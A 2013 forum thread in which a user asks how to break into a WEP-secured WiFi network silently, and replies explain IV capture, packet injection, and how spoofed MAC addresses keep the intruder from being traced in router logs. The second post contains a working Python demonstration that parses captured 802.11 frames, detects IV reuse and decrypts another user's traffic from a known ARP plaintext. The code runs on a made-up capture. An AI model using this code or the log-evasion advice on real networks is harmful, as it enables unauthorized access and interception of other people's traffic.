Wep Network Key
Started by Staneslevski, Feb 08 2013 16:29
5 replies to this topic
#1
Posted 08 February 2013 - 16:29
Hi all,
Just a quick question. I'm trying to work out whether it's possible to get into a WEP-secured WiFi network purely by packet sniffing. I've found loads of tutorials showing how to do it with BackTrack and a bit of packet injection, but I'm wondering if you can do it without making a noise?
I was once told that WEP is such a bad idea because at some point the key is transmitted over the network unencrypted. Is this true? If so, why can't I find a way to just sniff and read the right packets?
Thanks.
#2
Posted 08 February 2013 - 18:42
It's possible to crack it with passive sniffing; however, it'll take a lot of time. The vulnerability in WEP lies in the packets transferred between the client and the Access Point during authentication. What you see in the tutorials where they inject packets is done to deauthenticate the client from the AP, forcing them to reconnect and re-transmit the authentication steps over and over again, allowing you to capture the required number of IVs (packets containing the initialization vector, the vulnerable part of WEP). So you can passively sniff the network for IVs, but you'll have to capture natural connections between clients and the AP, which can take a long time.
You'll need around 50,000 to 100,000 IVs to crack the WEP key quickly. Fewer can do it; it just takes longer to brute-force.
[EDIT] Just read up on some theory. It's not in the authentication that the IVs are transmitted, but in general traffic. And the packet injections aren't to deauth the client from the AP, but rather just to create traffic to "lure out" more packets with weak IVs.
I think I confused some WPA cracking with WEP...
A good read on WEP cracking: http://www.aircrack-...imple_wep_crack
Edited by Lameth, 08 February 2013 - 18:53.
~Lameth
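To make the IV point in the reply above concrete, here is an added example in Python (my code, not from the thread and not from the aircrack-ng tutorial it links). It builds a small constructed WEP capture with a made-up 40-bit key and made-up, locally administered MAC addresses, reads the clear-text IV out of each protected data frame the way a passive sniffer would, finds an IV that the client has used twice, and then, assuming the plaintext of one of the two frames is known (an ARP request, whose layout is predictable on any network), recovers the RC4 keystream for that IV and decrypts the other frame using nothing but the sniffed bytes. A birthday-bound helper shows why repeats of a 24-bit IV are expected after a few thousand frames.

```python
import math
import struct
import zlib
from collections import defaultdict

IV_BITS = 24  # the WEP IV is 24 bits and is sent in clear in front of every protected frame


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream of `length` bytes for `key` (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: a plain little-endian CRC-32, not a keyed MAC."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """Frame body as a STA or AP builds it: IV(3) | key id(1) | RC4_{IV||key}(plaintext | ICV)."""
    keystream = rc4(iv + key, len(plaintext) + 4)
    return iv + bytes([key_id << 6]) + xor(plaintext + icv(plaintext), keystream)


def data_frame(sta: bytes, bssid: bytes, body: bytes) -> bytes:
    """802.11 data frame: Frame Control (type data, To-DS, Protected), 24-byte MAC header, body."""
    return b"\x08\x41" + b"\x00\x00" + bssid + sta + bssid + b"\x00\x00" + body


def wep_iv(frame: bytes):
    """IV of a protected data frame, read from the unencrypted header; None for anything else."""
    is_data = (frame[0] & 0x0C) == 0x08
    protected = bool(frame[1] & 0x40)
    return frame[24:27] if is_data and protected and len(frame) >= 28 else None


def find_iv_reuse(frames):
    """Passive check over a capture: which IVs occur more than once, and in which frames."""
    seen = defaultdict(list)
    for n, frame in enumerate(frames):
        iv = wep_iv(frame)
        if iv is not None:
            seen[iv].append(n)
    return {iv: idx for iv, idx in seen.items() if len(idx) > 1}


def keystream_from_known(frame: bytes, known_plaintext: bytes) -> bytes:
    """Ciphertext XOR (plaintext | ICV) is the keystream for this frame's IV; the ICV is a
    CRC the attacker can compute himself, so a known plaintext yields four extra bytes."""
    return xor(frame[28:], known_plaintext + icv(known_plaintext))


def decrypt_with_keystream(frame: bytes, keystream: bytes):
    """Decrypt a frame that shares the IV. Returns (plaintext, icv_ok); icv_ok is False
    when the keystream is too short for the frame or belongs to a different IV."""
    body = frame[28:]
    recovered = xor(body, keystream)
    if len(recovered) < len(body):
        return recovered, False  # only a prefix of the frame is recoverable
    return recovered[:-4], recovered[-4:] == icv(recovered[:-4])


def iv_collision_probability(n_frames: int) -> float:
    """Birthday bound: chance of at least one repeated IV among n uniformly random IVs."""
    return 1.0 - math.exp(-n_frames * (n_frames - 1) / (2 * 2 ** IV_BITS))


# --- constructed capture (not real traffic): key, addresses and payloads are made up ---
KEY = bytes.fromhex("0102030405")            # 40-bit WEP key shared by AP and client
STA = bytes.fromhex("020000000002")          # locally administered, made-up MAC addresses
BSSID = bytes.fromhex("020000000001")
# ARP request "who has 10.0.0.1, tell 10.0.0.2": fixed layout, so a sniffer can predict it
ARP_REQUEST = (bytes.fromhex("aaaa030000000806") + bytes.fromhex("0001080006040001")
               + STA + bytes.fromhex("0a000002") + bytes(6) + bytes.fromhex("0a000001"))
HTTP_GET = bytes.fromhex("aaaa030000000800") + b"GET /admin HTTP/1.0\r\n"
CAPTURE = [
    data_frame(STA, BSSID, wep_encrypt(KEY, b"\x00\x01\x00", ARP_REQUEST)),
    data_frame(STA, BSSID, wep_encrypt(KEY, b"\x00\x01\x01", ARP_REQUEST)),
    b"\x80\x00" + bytes(22) + b"beacon",     # management frame: carries no IV, must be skipped
    data_frame(STA, BSSID, wep_encrypt(KEY, b"\x00\x01\x02", HTTP_GET)),
    data_frame(STA, BSSID, wep_encrypt(KEY, b"\x00\x01\x01", HTTP_GET)),  # IV 000101 reused
]


def recover_colliding_frames(frames, known_index, known_plaintext):
    """Use one frame with known plaintext to decrypt every other frame that shares its IV."""
    iv = wep_iv(frames[known_index])
    keystream = keystream_from_known(frames[known_index], known_plaintext)
    return [decrypt_with_keystream(frames[n], keystream)
            for n in find_iv_reuse(frames).get(iv, []) if n != known_index]
```

`find_iv_reuse(CAPTURE)` reports IV 000101 in frames 1 and 4, and `recover_colliding_frames(CAPTURE, 1, ARP_REQUEST)` returns the HTTP request from frame 4 with a matching ICV; feeding the same function a keystream taken from a frame with a different IV fails the ICV check, which is the only way the sniffer can tell a correct keystream from a wrong one. This is IV reuse rather than the FMS weak-IV statistics that the linked aircrack-ng tutorial uses to recover the key itself, but it is the same root cause: the 24-bit IV is the only per-packet variation in the RC4 key, and it is visible to anyone listening.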
#3
Posted 12 February 2013 - 10:10
Thanks for that, I'll do some more reading. I'm just wary, as wouldn't packet injection cause identifying information to get left in the router's log files?
Cheers. S
#4
Posted 12 February 2013 - 14:35
If the router logs that kind of traffic (usually they only log administrator logon and sometimes client authentication), it wouldn't be traceable back to you, as the packet injections would only work if they spoof the source MAC address. The MAC address will have to be an already authenticated party, otherwise the router will ignore it. So with the packet injections, the router will see it as coming from the other client, and not you. A log file with huge amounts of suspicious traffic is an indication that something is happening, and with some specialised tools it could be possible to track you down while you were actively injecting packets.
~Lameth
#5
Posted 12 February 2013 - 22:03
I see. Much obliged for the info. Also, the 'specialised tools' you speak of are seriously cool. If I had money to burn that would definitely be my favourite toy. Cheers.
#6
Posted 13 February 2013 - 21:05
Aye. A colleague of mine is trying to convince our boss that we as an IT department can't live without it.
~Lameth